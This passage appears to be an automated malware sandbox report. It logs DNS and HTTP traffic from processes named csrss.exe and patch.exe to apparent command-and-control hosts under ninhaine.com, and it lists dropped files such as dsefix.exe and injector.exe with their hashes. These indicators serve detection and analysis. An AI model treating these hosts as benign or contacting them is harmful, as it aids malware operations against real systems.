    Set-Cookie: session_id=86f6e877335a4ad6fe6e636b71175df3; Path=/; HttpOnly; Max-Age=86400; Expires=Thursday, 26-Dec-2024 20:52:43 GMT
    Content-Encoding: gzip
  • flag-us
    GET
    http://ww82.ninhaine.com/
    csrss.exe
    Remote address:
    199.59.243.227:80
    Request
    GET / HTTP/1.1
    Host: ww82.ninhaine.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    date: Thu, 26 Dec 2024 20:52:49 GMT
    content-type: text/html; charset=utf-8
    content-length: 1054
    x-request-id: be4dc54e-fb0b-4d5f-949e-005029ba8b4f
    cache-control: no-store, max-age=0
    accept-ch: sec-ch-prefers-color-scheme
    critical-ch: sec-ch-prefers-color-scheme
    vary: sec-ch-prefers-color-scheme
    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jEyvJ3XCg2rO9uAKElUrv3UAXZvpjOJ/HM77J+Gmj3l7OQQo8JBRIGYqWcjZsTojCY8ThlpncB7ee/dDu7ralA==
    set-cookie: parking_session=be4dc54e-fb0b-4d5f-949e-005029ba8b4f; expires=Thu, 26 Dec 2024 21:07:50 GMT; path=/
  • flag-de
    GET
    http://ww53.ninhaine.com/
    csrss.exe
    Remote address:
    172.104.149.86:80
    Request
    GET / HTTP/1.1
    Host: ww53.ninhaine.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: openresty/1.27.1.1
    Date: Thu, 26 Dec 2024 20:52:56 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Set-Cookie: session_id=0bd69af7aebc9f9f13f8f53ef9277fac; Path=/; HttpOnly; Max-Age=86400; Expires=Thursday, 26-Dec-2024 20:52:56 GMT
    Content-Encoding: gzip
  • flag-us
    DNS
    vsblobprodscussu5shard20.blob.core.windows.net
    patch.exe
    Remote address:
    8.8.8.8:53
    Request
    vsblobprodscussu5shard20.blob.core.windows.net
    IN A
    Response
    vsblobprodscussu5shard20.blob.core.windows.net
    IN CNAME
    blob.sat09prdstrz08a.store.core.windows.net
    blob.sat09prdstrz08a.store.core.windows.net
    IN CNAME
    blob.sat09prdstrz08a.trafficmanager.net
    blob.sat09prdstrz08a.trafficmanager.net
    IN A
    20.150.38.228
    blob.sat09prdstrz08a.trafficmanager.net
    IN A
    20.150.70.36
    blob.sat09prdstrz08a.trafficmanager.net
    IN A
    20.150.79.68
  • flag-us
    GET
    https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=eQXj1ehpV6Oe1JGXSu6r4pcZrly4tJEvHlEND6M%2FdtE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-26T15%3A46%3A50Z&ske=2024-12-28T16%3A46%3A50Z&sks=b&skv=2019-07-07&se=2024-12-27T21%3A04%3A40Z&sp=r&rscl=x-e2eid-4281acc4-3e654bf9-9096f5a6-32abdb9b-session-65e5332c-3327490a-be498c32-8683bc9d
    patch.exe
    Remote address:
    20.150.38.228:443
    Request
    GET /b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=eQXj1ehpV6Oe1JGXSu6r4pcZrly4tJEvHlEND6M%2FdtE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-26T15%3A46%3A50Z&ske=2024-12-28T16%3A46%3A50Z&sks=b&skv=2019-07-07&se=2024-12-27T21%3A04%3A40Z&sp=r&rscl=x-e2eid-4281acc4-3e654bf9-9096f5a6-32abdb9b-session-65e5332c-3327490a-be498c32-8683bc9d HTTP/1.1
    Accept-Encoding: gzip
    User-Agent: Microsoft-Symbol-Server/10.0.10586.567
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: vsblobprodscussu5shard20.blob.core.windows.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 503808
    Content-Type: application/octet-stream
    Content-Language: x-e2eid-4281acc4-3e654bf9-9096f5a6-32abdb9b-session-65e5332c-3327490a-be498c32-8683bc9d
    Last-Modified: Fri, 02 Feb 2024 04:23:06 GMT
    Accept-Ranges: bytes
    ETag: "0x8DC23A6A7A80D5E"
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: a0da7233-901e-0045-16d8-5783eb000000
    x-ms-version: 2019-07-07
    x-ms-creation-time: Fri, 02 Feb 2024 04:23:06 GMT
    x-ms-lease-status: unlocked
    x-ms-lease-state: available
    x-ms-blob-type: BlockBlob
    x-ms-server-encrypted: true
    Access-Control-Expose-Headers: Content-Length
    Access-Control-Allow-Origin: *
    Date: Thu, 26 Dec 2024 20:53:00 GMT
  • flag-us
    GET
    https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=eQXj1ehpV6Oe1JGXSu6r4pcZrly4tJEvHlEND6M%2FdtE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-26T15%3A46%3A50Z&ske=2024-12-28T16%3A46%3A50Z&sks=b&skv=2019-07-07&se=2024-12-27T21%3A04%3A40Z&sp=r&rscl=x-e2eid-4281acc4-3e654bf9-9096f5a6-32abdb9b-session-65e5332c-3327490a-be498c32-8683bc9d
    patch.exe
    Remote address:
    20.150.38.228:443
    Request
    GET /b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=eQXj1ehpV6Oe1JGXSu6r4pcZrly4tJEvHlEND6M%2FdtE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-26T15%3A46%3A50Z&ske=2024-12-28T16%3A46%3A50Z&sks=b&skv=2019-07-07&se=2024-12-27T21%3A04%3A40Z&sp=r&rscl=x-e2eid-4281acc4-3e654bf9-9096f5a6-32abdb9b-session-65e5332c-3327490a-be498c32-8683bc9d HTTP/1.1
    Accept-Encoding: gzip
    User-Agent: Microsoft-Symbol-Server/10.0.10586.567
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: vsblobprodscussu5shard20.blob.core.windows.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 503808
    Content-Type: application/octet-stream
    Content-Language: x-e2eid-4281acc4-3e654bf9-9096f5a6-32abdb9b-session-65e5332c-3327490a-be498c32-8683bc9d
    Last-Modified: Fri, 02 Feb 2024 04:23:06 GMT
    Accept-Ranges: bytes
    ETag: "0x8DC23A6A7A80D5E"
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: a0da762e-901e-0045-72d8-5783eb000000
    x-ms-version: 2019-07-07
    x-ms-creation-time: Fri, 02 Feb 2024 04:23:06 GMT
    x-ms-lease-status: unlocked
    x-ms-lease-state: available
    x-ms-blob-type: BlockBlob
    x-ms-server-encrypted: true
    Access-Control-Expose-Headers: Content-Length
    Access-Control-Allow-Origin: *
    Date: Thu, 26 Dec 2024 20:53:01 GMT
  • flag-us
    DNS
    crl.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    crl.microsoft.com
    IN A
    Response
    crl.microsoft.com
    IN CNAME
    crl.www.ms.akadns.net
    crl.www.ms.akadns.net
    IN CNAME
    a1363.dscg.akamai.net
    a1363.dscg.akamai.net
    IN A
    2.19.252.143
    a1363.dscg.akamai.net
    IN A
    2.19.252.157
  • flag-gb
    GET
    http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
    Remote address:
    2.19.252.143:80
    Request
    GET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Thu, 11 Jul 2024 01:45:51 GMT
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: crl.microsoft.com
    Response
    HTTP/1.1 200 OK
    Content-Length: 1036
    Content-Type: application/octet-stream
    Content-MD5: +oTkvMkqpdtzWrUHEQQM3g==
    Last-Modified: Thu, 12 Dec 2024 00:06:56 GMT
    ETag: 0x8DD1A40E476D877
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 346168ca-101e-0054-5d36-4c18bd000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Thu, 26 Dec 2024 20:53:03 GMT
    Connection: keep-alive
  • flag-us
    DNS
    www.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    www.microsoft.com
    IN A
    Response
    www.microsoft.com
    IN CNAME
    www.microsoft.com-c-3.edgekey.net
    www.microsoft.com-c-3.edgekey.net
    IN CNAME
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    IN CNAME
    e13678.dscb.akamaiedge.net
    e13678.dscb.akamaiedge.net
    IN A
    95.100.245.144
  • flag-gb
    GET
    http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
    Remote address:
    95.100.245.144:80
    Request
    GET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: www.microsoft.com
    Response
    HTTP/1.1 200 OK
    Content-Length: 1078
    Content-Type: application/octet-stream
    Content-MD5: PjrtHAukbJio72s77Ag5mA==
    Last-Modified: Thu, 31 Oct 2024 23:26:09 GMT
    ETag: 0x8DCFA0366D6C4CA
    x-ms-request-id: 7ca9c103-d01e-0016-3fee-2ba13d000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Thu, 26 Dec 2024 20:53:03 GMT
    Connection: keep-alive
    TLS_version: UNKNOWN
    ms-cv: CASMicrosoftCV710d1296.0
    ms-cv-esi: CASMicrosoftCV710d1296.0
    X-RTag: RT
  • flag-de
    GET
    http://ww53.ninhaine.com/
    csrss.exe
    Remote address:
    172.104.149.86:80
    Request
    GET / HTTP/1.1
    Host: ww53.ninhaine.com
    User-Agent: Go-http-client/1.1
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: openresty/1.27.1.1
    Date: Thu, 26 Dec 2024 20:53:03 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Set-Cookie: session_id=364e0d27cb0b9ee71bacfc822a8ce423; Path=/; HttpOnly; Max-Age=86400; Expires=Thursday, 26-Dec-2024 20:53:03 GMT
    Content-Encoding: gzip
  • flag-us
    GET
    http://ww82.ninhaine.com/
    csrss.exe
    Remote address:
    199.59.243.227:80
    Request
    GET / HTTP/1.1
    Host: ww82.ninhaine.com
    User-Agent: Go-http-client/1.1
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    date: Thu, 26 Dec 2024 20:53:08 GMT
    content-type: text/html; charset=utf-8
    content-length: 1054
    x-request-id: c929bd67-6f9e-4d92-ba74-c3b6f804564a
    cache-control: no-store, max-age=0
    accept-ch: sec-ch-prefers-color-scheme
    critical-ch: sec-ch-prefers-color-scheme
    vary: sec-ch-prefers-color-scheme
    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tt/J9oqHpuqXX6un3Cskdko3ntgD1EOja6YOeQ+8B1Hpbe2+JoOhWbyNcOz/GR92FxtaOj/IK4FrDZpNw9TExw==
    set-cookie: parking_session=c929bd67-6f9e-4d92-ba74-c3b6f804564a; expires=Thu, 26 Dec 2024 21:08:09 GMT; path=/
  • flag-de
    GET
    http://ww53.ninhaine.com/
    csrss.exe
    Remote address:
    172.104.149.86:80
    Request
    GET / HTTP/1.1
    Host: ww53.ninhaine.com
    User-Agent: Go-http-client/1.1
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: openresty/1.27.1.1
    Date: Thu, 26 Dec 2024 20:53:18 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Set-Cookie: session_id=448df3c9830b9cc8d4e3f9a194f7c4e7; Path=/; HttpOnly; Max-Age=86400; Expires=Thursday, 26-Dec-2024 20:53:18 GMT
    Content-Encoding: gzip
  • flag-us
    DNS
    spolaect.info
    csrss.exe
    Remote address:
    8.8.8.8:53
    Request
    spolaect.info
    IN A
    Response
  • flag-de
    GET
    http://ww53.ninhaine.com/
    csrss.exe
    Remote address:
    172.104.149.86:80
    Request
    GET / HTTP/1.1
    Host: ww53.ninhaine.com
    User-Agent: Go-http-client/1.1
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: openresty/1.27.1.1
    Date: Thu, 26 Dec 2024 20:53:31 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Set-Cookie: session_id=b2ae7588669284462fd50de12e5f3883; Path=/; HttpOnly; Max-Age=86400; Expires=Thursday, 26-Dec-2024 20:53:31 GMT
    Content-Encoding: gzip
  • flag-de
    GET
    http://ww53.ninhaine.com/
    csrss.exe
    Remote address:
    172.104.149.86:80
    Request
    GET / HTTP/1.1
    Host: ww53.ninhaine.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: openresty/1.27.1.1
    Date: Thu, 26 Dec 2024 20:54:31 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Set-Cookie: session_id=6791be44110df5ffef9c8f566ba2c3a9; Path=/; HttpOnly; Max-Age=86400; Expires=Thursday, 26-Dec-2024 20:54:31 GMT
    Content-Encoding: gzip
  • 46.8.8.145:443
    server12.ninhaine.com
    tls
    csrss.exe
    739 B
    3.4kB
    8
    6
  • 46.8.8.145:443
    server12.ninhaine.com
    tls
    csrss.exe
    17.6kB
    6.3kB
    55
    56
  • 204.79.197.219:443
    https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb
    tls, http
    patch.exe
    2.8kB
    10.8kB
    17
    21

    HTTP Request

    GET https://msdl.microsoft.com/download/symbols/index2.txt

    HTTP Response

    404

    HTTP Request

    GET https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb

    HTTP Response

    302

    HTTP Request

    GET https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb

    HTTP Response

    302

    HTTP Request

    GET https://msdl.microsoft.com/download/symbols/index2.txt

    HTTP Response

    404

    HTTP Request

    GET https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb

    HTTP Response

    302

    HTTP Request

    GET https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb

    HTTP Response

    302
  • 20.150.79.68:443
    https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=k0Y3f305j%2FOWNx7LgEoG2RrV69w6IZYR11iIO3mI2Tw%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-26T18%3A05%3A25Z&ske=2024-12-28T19%3A05%3A25Z&sks=b&skv=2019-07-07&se=2024-12-27T21%3A19%3A29Z&sp=r&rscl=x-e2eid-83bfc5a1-de0d49d8-bacae7c2-d8f9e7aa-session-65e7ef38-3327490a-be498c32-8683bc9d
    tls, http
    patch.exe
    342.0kB
    18.1MB
    7167
    12982

    HTTP Request

    GET https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=k0Y3f305j%2FOWNx7LgEoG2RrV69w6IZYR11iIO3mI2Tw%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-26T18%3A05%3A25Z&ske=2024-12-28T19%3A05%3A25Z&sks=b&skv=2019-07-07&se=2024-12-27T21%3A19%3A29Z&sp=r&rscl=x-e2eid-83bfc5a1-de0d49d8-bacae7c2-d8f9e7aa-session-65e7ef38-3327490a-be498c32-8683bc9d

    HTTP Response

    200

    HTTP Request

    GET https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=k0Y3f305j%2FOWNx7LgEoG2RrV69w6IZYR11iIO3mI2Tw%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-26T18%3A05%3A25Z&ske=2024-12-28T19%3A05%3A25Z&sks=b&skv=2019-07-07&se=2024-12-27T21%3A19%3A29Z&sp=r&rscl=x-e2eid-83bfc5a1-de0d49d8-bacae7c2-d8f9e7aa-session-65e7ef38-3327490a-be498c32-8683bc9d

    HTTP Response

    200
  • 172.104.149.86:80
    http://ww53.ninhaine.com/
    http
    csrss.exe
    423 B
    1.5kB
    6
    5

    HTTP Request

    GET http://ww53.ninhaine.com/

    HTTP Response

    200
  • 172.104.149.86:80
    http://ww53.ninhaine.com/
    http
    csrss.exe
    421 B
    1.5kB
    6
    5

    HTTP Request

    GET http://ww53.ninhaine.com/

    HTTP Response

    200
  • 172.104.149.86:80
    http://ww53.ninhaine.com/
    http
    csrss.exe
    475 B
    1.5kB
    6
    5

    HTTP Request

    GET http://ww53.ninhaine.com/

    HTTP Response

    200
  • 199.59.243.227:80
    http://ww82.ninhaine.com/
    http
    csrss.exe
    475 B
    2.4kB
    7
    7

    HTTP Request

    GET http://ww82.ninhaine.com/

    HTTP Response

    200
  • 172.104.149.86:80
    http://ww53.ninhaine.com/
    http
    csrss.exe
    434 B
    1.5kB
    6
    5

    HTTP Request

    GET http://ww53.ninhaine.com/

    HTTP Response

    200
  • 199.59.243.227:80
    http://ww82.ninhaine.com/
    http
    csrss.exe
    486 B
    2.4kB
    7
    7

    HTTP Request

    GET http://ww82.ninhaine.com/

    HTTP Response

    200
  • 172.104.149.86:80
    http://ww53.ninhaine.com/
    http
    csrss.exe
    470 B
    1.5kB
    6
    5

    HTTP Request

    GET http://ww53.ninhaine.com/

    HTTP Response

    200
  • 20.150.38.228:443
    https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=eQXj1ehpV6Oe1JGXSu6r4pcZrly4tJEvHlEND6M%2FdtE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-26T15%3A46%3A50Z&ske=2024-12-28T16%3A46%3A50Z&sks=b&skv=2019-07-07&se=2024-12-27T21%3A04%3A40Z&sp=r&rscl=x-e2eid-4281acc4-3e654bf9-9096f5a6-32abdb9b-session-65e5332c-3327490a-be498c32-8683bc9d
    tls, http
    patch.exe
    19.9kB
    1.1MB
    393
    757

    HTTP Request

    GET https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=eQXj1ehpV6Oe1JGXSu6r4pcZrly4tJEvHlEND6M%2FdtE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-26T15%3A46%3A50Z&ske=2024-12-28T16%3A46%3A50Z&sks=b&skv=2019-07-07&se=2024-12-27T21%3A04%3A40Z&sp=r&rscl=x-e2eid-4281acc4-3e654bf9-9096f5a6-32abdb9b-session-65e5332c-3327490a-be498c32-8683bc9d

    HTTP Response

    200

    HTTP Request

    GET https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=eQXj1ehpV6Oe1JGXSu6r4pcZrly4tJEvHlEND6M%2FdtE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-26T15%3A46%3A50Z&ske=2024-12-28T16%3A46%3A50Z&sks=b&skv=2019-07-07&se=2024-12-27T21%3A04%3A40Z&sp=r&rscl=x-e2eid-4281acc4-3e654bf9-9096f5a6-32abdb9b-session-65e5332c-3327490a-be498c32-8683bc9d

    HTTP Response

    200
  • 2.19.252.143:80
    http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
    http
    399 B
    1.7kB
    4
    4

    HTTP Request

    GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

    HTTP Response

    200
  • 95.100.245.144:80
    http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
    http
    393 B
    1.7kB
    4
    4

    HTTP Request

    GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

    HTTP Response

    200
  • 172.104.149.86:80
    http://ww53.ninhaine.com/
    http
    csrss.exe
    377 B
    1.5kB
    5
    5

    HTTP Request

    GET http://ww53.ninhaine.com/

    HTTP Response

    200
  • 199.59.243.227:80
    http://ww82.ninhaine.com/
    http
    csrss.exe
    475 B
    2.4kB
    7
    7

    HTTP Request

    GET http://ww82.ninhaine.com/

    HTTP Response

    200
  • 172.104.149.86:80
    http://ww53.ninhaine.com/
    http
    csrss.exe
    377 B
    1.5kB
    5
    5

    HTTP Request

    GET http://ww53.ninhaine.com/

    HTTP Response

    200
  • 46.8.8.145:443
    server12.ninhaine.com
    tls
    csrss.exe
    1.7kB
    4.0kB
    16
    15
  • 172.104.149.86:80
    http://ww53.ninhaine.com/
    http
    csrss.exe
    377 B
    1.5kB
    5
    5

    HTTP Request

    GET http://ww53.ninhaine.com/

    HTTP Response

    200
  • 46.8.8.145:443
    server12.ninhaine.com
    tls
    csrss.exe
    2.1kB
    4.0kB
    16
    15
  • 172.104.149.86:80
    http://ww53.ninhaine.com/
    http
    csrss.exe
    434 B
    1.5kB
    6
    5

    HTTP Request

    GET http://ww53.ninhaine.com/

    HTTP Response

    200
  • 8.8.8.8:53
    ninhaine.com
    dns
    csrss.exe
    58 B
    58 B
    1
    1

    DNS Request

    ninhaine.com

  • 8.8.8.8:53
    2makestorage.com
    dns
    csrss.exe
    62 B
    135 B
    1
    1

    DNS Request

    2makestorage.com

  • 8.8.8.8:53
    nisdably.com
    dns
    csrss.exe
    58 B
    117 B
    1
    1

    DNS Request

    nisdably.com

  • 8.8.8.8:53
    70ec1b1f-4f95-41e7-a4b7-1d75ad9e690e.ninhaine.com
    dns
    csrss.exe
    95 B
    95 B
    1
    1

    DNS Request

    70ec1b1f-4f95-41e7-a4b7-1d75ad9e690e.ninhaine.com

  • 8.8.8.8:53
    server12.ninhaine.com
    dns
    csrss.exe
    67 B
    83 B
    1
    1

    DNS Request

    server12.ninhaine.com

    DNS Response

    46.8.8.145

  • 8.8.8.8:53
    msdl.microsoft.com
    dns
    patch.exe
    64 B
    182 B
    1
    1

    DNS Request

    msdl.microsoft.com

    DNS Response

    204.79.197.219

  • 8.8.8.8:53
    vsblobprodscussu5shard30.blob.core.windows.net
    dns
    patch.exe
    92 B
    231 B
    1
    1

    DNS Request

    vsblobprodscussu5shard30.blob.core.windows.net

    DNS Response

    20.150.79.68
    20.150.38.228
    20.150.70.36

  • 8.8.8.8:53
    ww53.ninhaine.com
    dns
    csrss.exe
    63 B
    148 B
    1
    1

    DNS Request

    ww53.ninhaine.com

    DNS Response

    172.104.149.86
    139.162.181.76
    172.104.251.198

  • 8.8.8.8:53
    ww82.ninhaine.com
    dns
    csrss.exe
    63 B
    105 B
    1
    1

    DNS Request

    ww82.ninhaine.com

    DNS Response

    199.59.243.227

  • 8.8.8.8:53
    vsblobprodscussu5shard20.blob.core.windows.net
    dns
    patch.exe
    92 B
    231 B
    1
    1

    DNS Request

    vsblobprodscussu5shard20.blob.core.windows.net

    DNS Response

    20.150.38.228
    20.150.70.36
    20.150.79.68

  • 8.8.8.8:53
    crl.microsoft.com
    dns
    63 B
    162 B
    1
    1

    DNS Request

    crl.microsoft.com

    DNS Response

    2.19.252.143
    2.19.252.157

  • 8.8.8.8:53
    www.microsoft.com
    dns
    63 B
    230 B
    1
    1

    DNS Request

    www.microsoft.com

    DNS Response

    95.100.245.144

  • 8.8.8.8:53
    spolaect.info
    dns
    csrss.exe
    59 B
    138 B
    1
    1

    DNS Request

    spolaect.info

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

    Filesize

    8.3MB

    MD5

    fd2727132edd0b59fa33733daa11d9ef

    SHA1

    63e36198d90c4c2b9b09dd6786b82aba5f03d29a

    SHA256

    3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e

    SHA512

    3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

  • C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

    Filesize

    492KB

    MD5

    fafbf2197151d5ce947872a4b0bcbe16

    SHA1

    a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020

    SHA256

    feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71

    SHA512

    acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

  • C:\Users\Admin\AppData\Local\Temp\osloader.exe

    Filesize

    591KB

    MD5

    e2f68dc7fbd6e0bf031ca3809a739346

    SHA1

    9c35494898e65c8a62887f28e04c0359ab6f63f5

    SHA256

    b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

    SHA512

    26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

  • \Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

    Filesize

    94KB

    MD5

    d98e78fd57db58a11f880b45bb659767

    SHA1

    ab70c0d3bd9103c07632eeecee9f51d198ed0e76

    SHA256

    414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

    SHA512

    aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

  • \Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

    Filesize

    281KB

    MD5

    d98e33b66343e7c96158444127a117f6

    SHA1

    bb716c5509a2bf345c6c1152f6e3e1452d39d50d

    SHA256

    5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

    SHA512

    705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

  • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

